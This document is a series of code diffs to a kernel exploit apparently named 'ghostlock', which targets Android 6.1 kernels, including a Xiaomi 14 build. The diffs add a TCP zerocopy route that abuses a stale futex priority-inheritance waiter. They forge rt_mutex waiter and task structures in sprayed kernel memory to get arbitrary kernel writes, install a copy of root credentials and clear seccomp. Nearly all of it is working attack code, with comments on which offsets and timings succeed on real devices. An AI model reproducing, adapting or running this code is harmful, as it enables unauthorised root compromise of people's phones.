+     * reclaim pipe objects its in-flight syscall still references, so leak
+     * them instead and let process exit reclaim. */
+    route_last_step = 34;
+    pr_error("pselect consumer still inflight; leaking route fds\n");
+  } else {
+    if (block_fd != pipefd[0]) {
+      close(block_fd);
+    }
+    close(pipefd[0]);
+    close(pipefd[1]);
   }
-  close(pipefd[0]);
-  close(pipefd[1]);
 
   pr_info("pselect route done calls=%d success=%d step=%d errno=%d\n",
           calls, success, route_last_step, route_last_errno);

--- a/src/core/fops.c
+++ b/src/core/fops.c
@@ -12,10 +12,9 @@ extern int pselect_custom_write;
 int route_last_step;
 int route_last_errno;
 
-/* ---- TCP zerocopy route (Root-My-Pixel-Payloads src/61/fops.c do_tcp_fake_lock_route) ----
- * The only device-proven 6.1 transport. getsockopt(TCP_ZEROCOPY_RECEIVE)
- * parks a frame whose zc words overlap the stale futex waiter: zc[0x28]
- * becomes waiter->task, zc[0x30] waiter->lock. */
+/* TCP zerocopy route: getsockopt(TCP_ZEROCOPY_RECEIVE) parks a frame whose
+ * zc words overlap the stale waiter; zc[0x28] is waiter->task, zc[0x30]
+ * waiter->lock. */
 #define TCP_PUNCH_SHMEM_LEN (16 * 1024 * 1024)
 #define TCP_ROUTE_ATTEMPTS 2000
 #define TCP_ARM_SEQ 16
@@ -111,8 +110,8 @@ static void *tcp_punch_thread(void *arg) {
     if (fallocate(state->fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                   (off_t)state->page_size,
                   TCP_PUNCH_SHMEM_LEN - state->page_size) != 0) {
-      /* without the hole the target page keeps its stale contents and the
-       * zerocopy write no longer lands as zeros */
+      /* without the hole the target page keeps stale contents and the
+       * zerocopy write misses */
       atomic_store(&tcp_punch_failed, errno ? errno : EIO);
       pr_warning("tcp punch hole errno=%d\n", errno);
     }
@@ -186,12 +185,10 @@ void do_tcp_fake_lock_route(void) {
   }
   puncher_started = 1;
 
-  /* Root-My-Pixel-Payloads MAIN_TCP_PAYLOAD=1: the waiter->task word carries the phys
-   * alias of init_task, not the image address. */
+  /* waiter->task carries init_task's phys alias, not the image address */
   uintptr_t waiter_task = SLIDE_INIT_TASK;
   int arm_seq = TCP_ARM_SEQ;
   int post_hold = TCP_POST_GETSOCKOPT_HOLD;
-  /* knobs from Root-My-Pixel-Payloads src/61, hardcoded to proven defaults */
 
   pr_info("tcp route enter page=%016zx fake_lock=%016zx fake_w0=%016zx "
           "fake_task=%016zx task=%016zx attempts=%d arm=%d hold=%d\n",
@@ -199,7 +196,7 @@ void do_tcp_fake_lock_route(void) {
           TCP_ROUTE_ATTEMPTS, arm_seq, post_hold);
 
   atomic_store(&tcp_punch_go, 1);
-  /* Custom-write mode: fire the PI walk immediately (delay 0, per Root-My-Pixel-Payloads). */
+  /* custom-write mode: fire the PI walk immediately */
   atomic_store(&main_route_delay_usec, 0);
 
   char sendbuf[64];
@@ -237,9 +234,8 @@ void do_tcp_fake_lock_route(void) {
     int ret = getsockopt(client_fd, IPPROTO_TCP, TCP_ZEROCOPY_RECEIVE, zc,
                          &len);
     int saved_errno = errno;
-    /* Arm barrier: release the consumer only once the zerocopy write has
-     * landed in the waiter frame. Releasing earlier lets sched_setattr walk
-     * a half-written waiter and the attempt misses. */
+    /* release the consumer only once the zerocopy write landed in the
+     * waiter frame; earlier release walks a half-written waiter */
     if (i >= arm_seq && ret == 0) {
       atomic_store(&punch_consume_go, i);
       for (int spin = 0; spin < post_hold; spin++) {
@@ -258,8 +254,8 @@ void do_tcp_fake_lock_route(void) {
       }
       continue;
     }
-    /* Consumer fired = the PI walk derefed the crafted waiter and wrote.
-     * Ghostlock stages verify their own effects; no cfi stage here. */
+    /* consumer fired: the PI walk derefed the crafted waiter and wrote.
+     * stages verify their own effects; no cfi stage here. */
     route_ok = 1;
     route_last_step = 0;
     route_last_errno = 0;
@@ -516,7 +512,7 @@ void do_pselect_fake_lock_route(void) {
     };
     ret = pselect(PSELECT_ROUTE_NFDS, &in, &out, &ex, &ts, NULL);
   } else {
-    /* 6.6: select() with the proven {0, 200ms} window (unchanged). */
+    /* 6.6: select() with a {0, 200ms} timeout. */
     struct timeval timeout = {
       .tv_sec = PSELECT_TIMEOUT_SEC,
 #ifdef PSELECT_TIMEOUT_USEC

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -217,7 +217,11 @@ void *waiter_thread(void *arg __attribute__((unused))) {
   timeout.tv_sec += ROUTE_WAIT_SECONDS;
   atomic_store(&waiter_waiting, 1);
   futex_op(&f_wait, FUTEX_WAIT_REQUEUE_PI, 0, &timeout, &f_pi_target, 0);
-  do_pselect_fake_lock_route();
+  if (tcp_route_selected()) {
+    do_tcp_fake_lock_route();
+  } else {
+    do_pselect_fake_lock_route();
+  }
   atomic_store(&route_done, 1);
   futex_op(&f_pi_chain, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
   while (!atomic_load(&owner_chain_done)) usleep(1000);
@@ -262,7 +266,12 @@ void *consumer_thread(void *arg __attribute__((unused))) {
         atomic_fetch_add(&consumer_calls, 1);
         atomic_store(&consumer_inflight, 1);
         errno = 0;
-        long sched_ret = sched_setattr_tid(tid, PSELECT_CONSUMER_NICE);
+        /* dynamic nice from Root-My-Pixel-Payloads src/61: (calls%19)+1 is proven to make
+         * sched_setattr succeed on 6.1 compact. */
+        int consumer_nice = (active_offsets && active_offsets->compact_waiter)
+                                ? (calls_this_seq % 19) + 1
+                                : PSELECT_CONSUMER_NICE;
+        long sched_ret = sched_setattr_tid(tid, consumer_nice);
         if (sched_ret != 0) {
           struct timespec ft = {.tv_sec = 0, .tv_nsec = 50000000};
           long fret = futex_op(&f_pi_target, FUTEX_LOCK_PI, 0, &ft, NULL, 0);

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -266,8 +266,8 @@ void *consumer_thread(void *arg __attribute__((unused))) {
         atomic_fetch_add(&consumer_calls, 1);
         atomic_store(&consumer_inflight, 1);
         errno = 0;
-        /* dynamic nice from Root-My-Pixel-Payloads src/61: (calls%19)+1 is proven to make
-         * sched_setattr succeed on 6.1 compact. */
+        /* rotate the nice every call; (calls%19)+1 is what makes
+         * sched_setattr succeed on 6.1 compact */
         int consumer_nice = (active_offsets && active_offsets->compact_waiter)
                                 ? (calls_this_seq % 19) + 1
                                 : PSELECT_CONSUMER_NICE;
@@ -332,11 +332,9 @@ int run_main_route_threads(void) {
 
 static int do_one_write(uintptr_t target, const char *desc, int mode, int leaf) {
   pr_info("=== %s === target=0x%016zx mode=%d leaf=%d\n", desc, target, mode, leaf);
-  /* Both transports deliver *(target) := value via the erase's left-only
-   * relink: the consumed waiter words are {pi pc = value, rb_right = 0,
-   * rb_left = target}, so __rb_erase_augmented() stores the pc word into
-   * *(rb_left); the node is RED (even pc) so no color fixup follows.
-   * leaf=1 is just the value=0 payload (fake_right=0). */
+  /* Both transports write *(target) := value through the erase left-only
+   * relink: waiter words are {pc = value, right = 0, left = target} and
+   * the node is RED so no color fixup runs. leaf=1 is the value=0 payload. */
   pselect_child_node = leaf ? 0 : 1;
   set_pselect_write_mode(target, mode);
   TIMER("  heap spray start");

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -332,10 +332,11 @@ int run_main_route_threads(void) {
 
 static int do_one_write(uintptr_t target, const char *desc, int mode, int leaf) {
   pr_info("=== %s === target=0x%016zx mode=%d leaf=%d\n", desc, target, mode, leaf);
-  /* leaf=1 uses the "write 0" payload (fake_right=0). __rb_erase_augmented()
-   * case 1 then makes __rb_change_child() write parent->rb_right (= target)
-   * with the erased node's rb_right value: fake_left is always NULL so case 1
-   * always fires, and the erased node is RED so no color fixup runs. */
+  /* Both transports deliver *(target) := value via the erase's left-only
+   * relink: the consumed waiter words are {pi pc = value, rb_right = 0,
+   * rb_left = target}, so __rb_erase_augmented() stores the pc word into
+   * *(rb_left); the node is RED (even pc) so no color fixup follows.
+   * leaf=1 is just the value=0 payload (fake_right=0). */
   pselect_child_node = leaf ? 0 : 1;
   set_pselect_write_mode(target, mode);
   TIMER("  heap spray start");
@@ -996,23 +997,27 @@ int run_exploit(int argc, char **argv) {
      * (adb/shell skips). fork() re-arms TIF_SECCOMP while mode != 0, so mode
      * must be zeroed too; do both writes back-to-back with one probe
      * (real finit_module calls trip vendor root guards).
-     * Leaf writes land on [target] or [target+8]; a comm probe picks the side
-     * before targeting thread_info.flags (task+0) / seccomp.mode. */
+     * tcp stamps *(target) exactly, so aim straight at thread_info.flags
+     * (task+0) / seccomp.mode; only the pselect fallback needs the comm
+     * probe to tell [target] from [target+8]. */
     if (!process_has_seccomp()) {
       pr_success("no app seccomp filter (adb/shell flow); skipping W3\n");
       seccomp_ok = 1;
       break;
     }
 
+    int tcp_writes = tcp_route_selected();
     struct w3_stage_context w3_context = {
       .pipes = &pipes,
-      .leaf_to_target8 = 1,
+      .leaf_to_target8 = !tcp_writes,
     };
-    int dir_ok = retry_write_stage(
-        "W3-0: leaf dir", child_task + TASK_COMM_OFF, 1, 4, 50000,
-        verify_leaf_dir_stage, &w3_context, 1);
-    if (!dir_ok) {
-      pr_warning("W3 leaf direction probe failed; assuming [target+8]\n");
+    if (!tcp_writes) {
+      int dir_ok = retry_write_stage(
+          "W3-0: leaf dir", child_task + TASK_COMM_OFF, 1, 4, 50000,
+          verify_leaf_dir_stage, &w3_context, 1);
+      if (!dir_ok) {
+        pr_warning("W3 leaf direction probe failed; assuming [target+8]\n");
+      }
     }
 
     uintptr_t flags_target = w3_context.leaf_to_target8

--- a/src/core/offsets_json.c
+++ b/src/core/offsets_json.c
@@ -229,6 +229,14 @@ static void fill_external_entry(struct kernel_offsets *out,
   if (v && json_parse_int(v, end, &num)) {
     out->pselect_waiter_shift = (int)num;
   }
+  v = json_member_value(obj, end, "compact_waiter");
+  if (v && json_parse_int(v, end, &num)) {
+    out->compact_waiter = (uint8_t)num;
+  }
+  v = json_member_value(obj, end, "mm_struct_sz");
+  if (v && json_parse_int(v, end, &num)) {
+    out->mm_struct_sz = (uint32_t)num;
+  }
   v = json_member_value(obj, end, "symbols");
   if (v && *v == '{') {
     const char *v_end = v;
@@ -253,6 +261,12 @@ static void fill_external_entry(struct kernel_offsets *out,
         }
       }
     }
+  }
+  /* a zeroed entry selects the 6.6 waiter layout; warn rather than fail quietly */
+  if (strncmp(out->uname_r, "6.1.", 4) == 0 && !out->compact_waiter) {
+    fprintf(stderr,
+            "warning: imported 6.1 entry has no compact_waiter; it will run "
+            "the 6.6 rb_node waiter layout and miss\n");
   }
 }
 

--- a/src/core/offsets_json.h
+++ b/src/core/offsets_json.h
@@ -4,16 +4,10 @@
 #include <stddef.h>
 #include "../kernels/offsets.h"
 
-/* Load a kernel table from a JSON file (single object or array of objects)
- * and fill `out` for the kernel whose "release" equals `release`.  The format
- * matches tools/extract_rs/ghostlock-extract --format json, plus the
- * pselect_waiter_shift, compact_waiter and mm_struct_sz fields (the extractor
- * emits the latter two for 6.1 entries only).  Fields absent from the JSON
- * keep the values already in *out (zero it for a fresh table, or seed it
- * with a built-in entry the JSON is overriding).  Returns 0 and sets *out on
- * match; -1 when no entry matches or the file is unreadable/malformed.
- * release_buf receives a copy of the matched release string that stays valid
- * after the call. */
+/* Fill `out` from the JSON entry whose "release" equals `release`, in the
+ * format tools/extract_rs/ghostlock-extract --format json writes. Missing
+ * fields keep their values; returns 0 on match, -1 otherwise. release_buf
+ * gets a copy of the matched release string. */
 int load_offsets_json(const char *path, const char *release,
                       struct kernel_offsets *out, char *release_buf,
                       size_t release_buf_cap);

--- a/src/core/offsets_json.h
+++ b/src/core/offsets_json.h
@@ -7,12 +7,13 @@
 /* Load a kernel table from a JSON file (single object or array of objects)
  * and fill `out` for the kernel whose "release" equals `release`.  The format
  * matches tools/extract_rs/ghostlock-extract --format json, plus the
- * pselect_waiter_shift field.  Fields absent from the JSON keep the values
- * already in *out (zero it for a fresh table, or seed it with a built-in
- * entry the JSON is overriding).  Returns 0 and sets *out on match; -1 when
- * no entry matches or the file is unreadable/malformed.  release_buf
- * receives a copy of the matched release string that stays valid after the
- * call. */
+ * pselect_waiter_shift, compact_waiter and mm_struct_sz fields (the extractor
+ * emits the latter two for 6.1 entries only).  Fields absent from the JSON
+ * keep the values already in *out (zero it for a fresh table, or seed it
+ * with a built-in entry the JSON is overriding).  Returns 0 and sets *out on
+ * match; -1 when no entry matches or the file is unreadable/malformed.
+ * release_buf receives a copy of the matched release string that stays valid
+ * after the call. */
 int load_offsets_json(const char *path, const char *release,
                       struct kernel_offsets *out, char *release_buf,
                       size_t release_buf_cap);

--- a/src/core/target.h
+++ b/src/core/target.h
@@ -104,13 +104,9 @@
 /* W2 payload. */
 #define CRED_COPY_OFF 0x1080
 
-/* TCP zerocopy route payload geometry (Root-My-Pixel-Payloads src/61/util.c
- * MAIN_TCP_PAYLOAD): chunk bias 0xe80 and delta 0 live in util.c; these
- * are the in-chunk offsets that differ from the pselect layout.
- * fake_task 0x5800 is the value proven by Root-My-Pixel-Payloads (avoids the fake_lock
- * rb_leftmost misalignment). CRED copy moved past it; the pselect
- * 0x1080 slot lands inside the fake_task zone once the chunk bias
- * shifts by 0xe80. */
+/* TCP zerocopy payload offsets: fake_task sits at 0x5800 so it clears the
+ * fake_lock rb_leftmost zone; the cred copy follows because the pselect
+ * 0x1080 slot would land inside fake_task. */
 #define TCP_FAKE_TASK_OFF 0x5800
 #define TCP_CRED_COPY_OFF 0x6800
 

--- a/src/core/target.h
+++ b/src/core/target.h
@@ -104,4 +104,14 @@
 /* W2 payload. */
 #define CRED_COPY_OFF 0x1080
 
+/* TCP zerocopy route payload geometry (Root-My-Pixel-Payloads src/61/util.c
+ * MAIN_TCP_PAYLOAD): chunk bias 0xe80 and delta 0 live in util.c; these
+ * are the in-chunk offsets that differ from the pselect layout.
+ * fake_task 0x5800 is the value proven by Root-My-Pixel-Payloads (avoids the fake_lock
+ * rb_leftmost misalignment). CRED copy moved past it; the pselect
+ * 0x1080 slot lands inside the fake_task zone once the chunk bias
+ * shifts by 0xe80. */
+#define TCP_FAKE_TASK_OFF 0x5800
+#define TCP_CRED_COPY_OFF 0x6800
+
 #endif

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -372,33 +372,12 @@ int prepare_skb_payload(uintptr_t base) {
     put64(p, LOCK_OFF + 0x18, fake_task | 1);
 
     if (compact) {
-      /* 6.1 COMPACT_RT_MUTEX_WAITER:
-       * tree_entry[0x18] pi_tree_entry[0x18] task@0x30 lock@0x38
-       * wake_state@0x40 prio@0x44 deadline@0x48 ww_ctx@0x50
-       *
-       * TCP nonzero values ride the main_tcp convention
-       * (Root-My-Pixel-Payloads src/61, tokay default shape): pi pc
-       * carries the value, rb_left the destination; the erase
-       * left-only relink stores
-       * *(dest) := pc before anything is derived from pc. rb_right must
-       * stay 0 there: a nonzero right takes the one-child arm whose
-       * second write clobbers *(value+0) with dest-8 (houji W2 read
-       * that back as uid=upper32(dest-8)).
-       *
-       * Zero-value writes keep the target-8 shape instead: pc=0 leaves
-       * the relink parentless, which stamps dest into fake_task's
-       * pi_waiters root; the next enqueue_pi walks dest as an rb_node
-       * and trashes the task head (houji W3 panic). With pc=dest-8 the
-       * change_child else-branch stores 0 at *dest and the red victim
-       * makes rebalance NULL (rbtree_augmented.h case 1), so nothing
-       * else runs. The pselect fallback uses these words everywhere.
-       *
-       * prio must stay > DEFAULT_PRIO (120): only then does the stale
-       * waiter insert left of W0, become top waiter, and reach the
-       * rt_mutex_dequeue_pi erase that consumes these words. W2 accepts
-       * the relink's secondary write of dest into *(value+8), inside
-       * the cred image (gid/suid qword, uid untouched); value=0 sends
-       * it to the payload page's own rb_root instead. */
+      /* Words ride the erase relink: pc = value, rb_left = dest,
+       * rb_right = 0 or the one-child arm also clobbers *(value) with
+       * dest-8. Value 0 uses pc = dest-8 (stores 0 at *dest); pc = 0
+       * would leave the node parentless for enqueue_pi to trash
+       * fake_task. prio > 120 gates this erase. The relink's second
+       * write lands in *(value+8): cred image on W2, page rb_root at 0. */
       put64(p, W0_OFF + 0x00, 1);           /* tree_entry.rb_parent_color */
       put64(p, W0_OFF + 0x08, 0);           /* tree_entry.rb_right */
       put64(p, W0_OFF + 0x10, 0);           /* tree_entry.rb_left */

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -376,14 +376,22 @@ int prepare_skb_payload(uintptr_t base) {
        * tree_entry[0x18] pi_tree_entry[0x18] task@0x30 lock@0x38
        * wake_state@0x40 prio@0x44 deadline@0x48 ww_ctx@0x50
        *
-       * TCP rides the main_tcp word convention (Root-My-Pixel-Payloads src/61, tokay
-       * default shape): pi pc carries the value, rb_left the
-       * destination; the erase left-only relink stores
+       * TCP nonzero values ride the main_tcp convention
+       * (Root-My-Pixel-Payloads src/61, tokay default shape): pi pc
+       * carries the value, rb_left the destination; the erase
+       * left-only relink stores
        * *(dest) := pc before anything is derived from pc. rb_right must
-       * stay 0: with a nonzero right the erase takes the one-child arm
-       * and its second write clobbers *(value+0) with dest-8 (houji W2
-       * read that back as uid=upper32(dest-8)). The pselect fallback
-       * keeps the fdset-stamped stack-waiter words.
+       * stay 0 there: a nonzero right takes the one-child arm whose
+       * second write clobbers *(value+0) with dest-8 (houji W2 read
+       * that back as uid=upper32(dest-8)).
+       *
+       * Zero-value writes keep the target-8 shape instead: pc=0 leaves
+       * the relink parentless, which stamps dest into fake_task's
+       * pi_waiters root; the next enqueue_pi walks dest as an rb_node
+       * and trashes the task head (houji W3 panic). With pc=dest-8 the
+       * change_child else-branch stores 0 at *dest and the red victim
+       * makes rebalance NULL (rbtree_augmented.h case 1), so nothing
+       * else runs. The pselect fallback uses these words everywhere.
        *
        * prio must stay > DEFAULT_PRIO (120): only then does the stale
        * waiter insert left of W0, become top waiter, and reach the
@@ -394,7 +402,7 @@ int prepare_skb_payload(uintptr_t base) {
       put64(p, W0_OFF + 0x00, 1);           /* tree_entry.rb_parent_color */
       put64(p, W0_OFF + 0x08, 0);           /* tree_entry.rb_right */
       put64(p, W0_OFF + 0x10, 0);           /* tree_entry.rb_left */
-      if (tcp) {
+      if (tcp && write_right) {
         put64(p, W0_OFF + 0x18, write_right);
         put64(p, W0_OFF + 0x20, 0);
         put64(p, W0_OFF + 0x28, pselect_custom_target);

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -43,10 +43,19 @@ void clear_pselect_write(void) {
   pselect_custom_target = 0;
 }
 
+int tcp_route_selected(void) {
+  /* compact defaults to tcp; GHOSTLOCK_TCP_ROUTE=0 selects pselect */
+  const char *s = getenv("GHOSTLOCK_TCP_ROUTE");
+  if (s && *s && strcmp(s, "0") == 0) {
+    return 0;
+  }
+  return active_offsets && active_offsets->compact_waiter;
+}
+
 void setup_kernelsnitch(void) {
   int cpu_count = (int)sysconf(_SC_NPROCESSORS_ONLN);
   ks = kernelsnitch_setup(
-      MM_STRUCT_SZ, MM_ORDER, cpu_count, KSNITCH_COLLISIONS, 0, 0);
+      mm_struct_sz(), MM_ORDER, cpu_count, KSNITCH_COLLISIONS, 0, 0);
 }
 
 int kernelsnitch_collisions_ready(void) {
@@ -315,11 +324,16 @@ void prepare_ctxs(void) {
 int prepare_skb_payload(uintptr_t base) {
   memset(skb_buf, 0, SKB_SEND_SIZE);
 
-  uintptr_t payload_base = base + SKB_DATA_DELTA;
+  int tcp = tcp_route_selected();
+  long long payload_delta = tcp ? 0 : SKB_DATA_DELTA;
+  size_t chunk_bias = tcp ? 0xe80 : (size_t)SKB_FRAG_BIAS;
+  size_t fake_task_off = tcp ? TCP_FAKE_TASK_OFF : (size_t)FAKE_TASK_OFF;
+
+  uintptr_t payload_base = base + payload_delta;
 
   fake_lock = payload_base + LOCK_OFF;
   fake_w0 = payload_base + W0_OFF;
-  fake_task = payload_base + FAKE_TASK_OFF;
+  fake_task = payload_base + fake_task_off;
   fake_fops = payload_base + FOPS_TABLE_OFF;
   if (pselect_custom_write) {
     if (pselect_child_node) {
@@ -335,7 +349,7 @@ int prepare_skb_payload(uintptr_t base) {
     }
     fake_left = 0;
     if (pselect_custom_write == 2) {
-      fake_fops = payload_base + CRED_COPY_OFF;
+      fake_fops = payload_base + (tcp ? TCP_CRED_COPY_OFF : CRED_COPY_OFF);
     }
     fake_parent = pselect_custom_target - 8;
   }
@@ -347,39 +361,98 @@ int prepare_skb_payload(uintptr_t base) {
   uint64_t task_group = ROOT_TASK_GROUP;
   uint64_t pi_top_task = INIT_TASK;
 
+  int compact = active_offsets && active_offsets->compact_waiter;
+
   for (size_t chunk = 0; chunk < SKB_SEND_SIZE; chunk += ORDER3_SIZE) {
-    unsigned char *p = skb_buf + chunk + SKB_FRAG_BIAS;
+    unsigned char *p = skb_buf + chunk + chunk_bias;
 
     put32(p, LOCK_OFF + 0x00, 0);
     put64(p, LOCK_OFF + 0x08, fake_w0);
     put64(p, LOCK_OFF + 0x10, fake_w0);
     put64(p, LOCK_OFF + 0x18, fake_task | 1);
 
-    put64(p, W0_OFF + 0x00, 1);
-    put64(p, W0_OFF + 0x08, 0);
-    put64(p, W0_OFF + 0x10, 0);
-    put32(p, W0_OFF + FAKE_WAITER_TREE_PRIO_OFF, FAKE_WAITER_PRIO);
-    put64(p, W0_OFF + FAKE_WAITER_TREE_DEADLINE_OFF, 0);
-    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x00, write_pc);
-    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x08, write_right);
-    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x10, write_left);
-    put32(p, W0_OFF + FAKE_WAITER_PI_TREE_PRIO_OFF, FAKE_WAITER_PRIO);
-    put64(p, W0_OFF + FAKE_WAITER_PI_TREE_DEADLINE_OFF, 0);
-    put64(p, W0_OFF + FAKE_WAITER_TASK_OFF, waiter_task);
-    put64(p, W0_OFF + FAKE_WAITER_LOCK_OFF, fake_lock);
-    put32(p, W0_OFF + FAKE_WAITER_WAKE_STATE_OFF, 0);
-    put64(p, W0_OFF + FAKE_WAITER_WW_CTX_OFF, 0);
+    if (compact) {
+      /* 6.1 COMPACT_RT_MUTEX_WAITER:
+       * tree_entry[0x18] pi_tree_entry[0x18] task@0x30 lock@0x38
+       * wake_state@0x40 prio@0x44 deadline@0x48 ww_ctx@0x50
+       *
+       * TCP rides the main_tcp word convention (Root-My-Pixel-Payloads src/61, tokay
+       * default shape): pi pc carries the value, rb_left the
+       * destination; the erase left-only relink stores
+       * *(dest) := pc before anything is derived from pc. rb_right must
+       * stay 0: with a nonzero right the erase takes the one-child arm
+       * and its second write clobbers *(value+0) with dest-8 (houji W2
+       * read that back as uid=upper32(dest-8)). The pselect fallback
+       * keeps the fdset-stamped stack-waiter words.
+       *
+       * prio must stay > DEFAULT_PRIO (120): only then does the stale
+       * waiter insert left of W0, become top waiter, and reach the
+       * rt_mutex_dequeue_pi erase that consumes these words. W2 accepts
+       * the relink's secondary write of dest into *(value+8), inside
+       * the cred image (gid/suid qword, uid untouched); value=0 sends
+       * it to the payload page's own rb_root instead. */
+      put64(p, W0_OFF + 0x00, 1);           /* tree_entry.rb_parent_color */
+      put64(p, W0_OFF + 0x08, 0);           /* tree_entry.rb_right */
+      put64(p, W0_OFF + 0x10, 0);           /* tree_entry.rb_left */
+      if (tcp) {
+        put64(p, W0_OFF + 0x18, write_right);
+        put64(p, W0_OFF + 0x20, 0);
+        put64(p, W0_OFF + 0x28, pselect_custom_target);
+      } else {
+        put64(p, W0_OFF + 0x18, write_pc);    /* pi_tree_entry.rb_parent_color */
+        put64(p, W0_OFF + 0x20, write_right); /* pi_tree_entry.rb_right */
+        put64(p, W0_OFF + 0x28, write_left);  /* pi_tree_entry.rb_left */
+      }
+      put64(p, W0_OFF + 0x30, waiter_task); /* task */
+      put64(p, W0_OFF + 0x38, fake_lock);   /* lock */
+      put32(p, W0_OFF + 0x40, 0);           /* wake_state */
+      put32(p, W0_OFF + 0x44, FAKE_WAITER_PRIO); /* prio */
+      put64(p, W0_OFF + 0x48, 0);           /* deadline */
+      put64(p, W0_OFF + 0x50, 0);           /* ww_ctx */
+    } else {
+      /* 6.6 rt_mutex_waiter with rb_node tree/pi_tree */
+      put64(p, W0_OFF + 0x00, 1);
+      put64(p, W0_OFF + 0x08, 0);
+      put64(p, W0_OFF + 0x10, 0);
+      put32(p, W0_OFF + FAKE_WAITER_TREE_PRIO_OFF, FAKE_WAITER_PRIO);
+      put64(p, W0_OFF + FAKE_WAITER_TREE_DEADLINE_OFF, 0);
+      put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x00, write_pc);
+      put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x08, write_right);
+      put64(p, W0_OFF + FAKE_WAITER_PI_TREE_ENTRY_OFF + 0x10, write_left);
+      put32(p, W0_OFF + FAKE_WAITER_PI_TREE_PRIO_OFF, FAKE_WAITER_PRIO);
+      put64(p, W0_OFF + FAKE_WAITER_PI_TREE_DEADLINE_OFF, 0);
+      put64(p, W0_OFF + FAKE_WAITER_TASK_OFF, waiter_task);
+      put64(p, W0_OFF + FAKE_WAITER_LOCK_OFF, fake_lock);
+      put32(p, W0_OFF + FAKE_WAITER_WAKE_STATE_OFF, 0);
+      put64(p, W0_OFF + FAKE_WAITER_WW_CTX_OFF, 0);
+    }
 
-    put32(p, FAKE_TASK_OFF + FAKE_TASK_USAGE_OFF, 0x100);
-    put32(p, FAKE_TASK_OFF + FAKE_TASK_PRIO_OFF, FAKE_TASK_PRIO);
-    put32(p, FAKE_TASK_OFF + FAKE_TASK_NORMAL_PRIO_OFF, FAKE_TASK_PRIO);
-    put32(p, FAKE_TASK_OFF + FAKE_TASK_PI_LOCK_OFF, 0);
+    /* Use runtime offsets for 6.1 compact; target.h constants for 6.6. */
+    uint32_t ft_prio_off       = compact ? active_offsets->task_prio
+                                         : FAKE_TASK_PRIO_OFF;
+    uint32_t ft_nprio_off      = compact ? active_offsets->task_normal_prio
+                                         : FAKE_TASK_NORMAL_PRIO_OFF;
+    uint32_t ft_tg_off         = compact ? active_offsets->task_sched_task_group
+                                         : FAKE_TASK_TASK_GROUP_OFF;
+    uint32_t ft_pi_lock_off    = compact ? active_offsets->task_pi_lock
+                                         : FAKE_TASK_PI_LOCK_OFF;
+    uint32_t ft_pi_wait_off    = compact ? active_offsets->task_pi_waiters
+                                         : FAKE_TASK_PI_WAITERS_OFF;
+    uint32_t ft_pi_top_off     = compact ? active_offsets->task_pi_top_task
+                                         : FAKE_TASK_PI_TOP_TASK_OFF;
+    uint32_t ft_pi_blocked_off = compact ? active_offsets->task_pi_blocked_on
+                                         : FAKE_TASK_PI_BLOCKED_ON_OFF;
+
+    put32(p, fake_task_off + FAKE_TASK_USAGE_OFF, 0x100);
+    put32(p, fake_task_off + ft_prio_off, FAKE_TASK_PRIO);
+    put32(p, fake_task_off + ft_nprio_off, FAKE_TASK_PRIO);
+    put32(p, fake_task_off + ft_pi_lock_off, 0);
     /* Empty PI waiters avoid tree rebalancing during reinsertion. */
-    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF, 0);
-    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_WAITERS_OFF + 0x08, 0);
-    put64(p, FAKE_TASK_OFF + FAKE_TASK_TASK_GROUP_OFF, task_group);
-    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_TOP_TASK_OFF, pi_top_task);
-    put64(p, FAKE_TASK_OFF + FAKE_TASK_PI_BLOCKED_ON_OFF, 0);
+    put64(p, fake_task_off + ft_pi_wait_off, 0);
+    put64(p, fake_task_off + ft_pi_wait_off + 0x08, 0);
+    put64(p, fake_task_off + ft_tg_off, task_group);
+    put64(p, fake_task_off + ft_pi_top_off, pi_top_task);
+    put64(p, fake_task_off + ft_pi_blocked_off, 0);
 
     put64(p, RIGHT_OFF + 0x00, fake_parent);
     put64(p, RIGHT_OFF + 0x08, 0);
@@ -390,7 +463,7 @@ int prepare_skb_payload(uintptr_t base) {
     put64(p, LEFT_OFF + 0x10, 0);
 
     if (pselect_custom_write >= 2) {
-      fill_init_cred_copy(p, CRED_COPY_OFF);
+      fill_init_cred_copy(p, tcp ? TCP_CRED_COPY_OFF : CRED_COPY_OFF);
     }
   }
   return 1;
@@ -400,7 +473,7 @@ uintptr_t prepare_kernel_page(void) {
   struct timespec t_spray;
   clock_gettime(CLOCK_MONOTONIC, &t_spray);
   close_reclaim_sockets();
-  mm_objs_per_slab = ORDER3_SIZE / MM_STRUCT_SZ;
+  mm_objs_per_slab = ORDER3_SIZE / mm_struct_sz();
   prepare_ctxs();
 
   skb_buf = malloc(SKB_SEND_SIZE);
@@ -418,7 +491,7 @@ uintptr_t prepare_kernel_page(void) {
 
   int cpu_count = (int)sysconf(_SC_NPROCESSORS_ONLN);
   ks = kernelsnitch_setup(
-      MM_STRUCT_SZ, MM_ORDER, cpu_count, KSNITCH_COLLISIONS, 0, 0);
+      mm_struct_sz(), MM_ORDER, cpu_count, KSNITCH_COLLISIONS, 0, 0);
   pr_info("[spray] mm spray + kernelsnitch ready (cpu=%d) +%lldms\n",
           cpu_count, ms_since(&t_spray));
 

--- a/src/kernels/6.1.118-android14-11-gca0ef6d17716-ab13624819/offsets.h
+++ b/src/kernels/6.1.118-android14-11-gca0ef6d17716-ab13624819/offsets.h
@@ -1,0 +1,29 @@
+/* 6.1.118-android14-11-gca0ef6d17716-ab13624819: Xiaomi 14 (houji), SM8650,
+ * HyperOS 3.0.3.0.
+ * Anchors from the boot.img (kallsyms + BTF).
+ * kernel_phys_load: xbl_config FDT /soc/memorymap puts the Kernel region
+ * at 0xA8000000 (DRAM base 0x80000000 is XBL NOMAP). */
+
+OFFSETS_ENTRY(
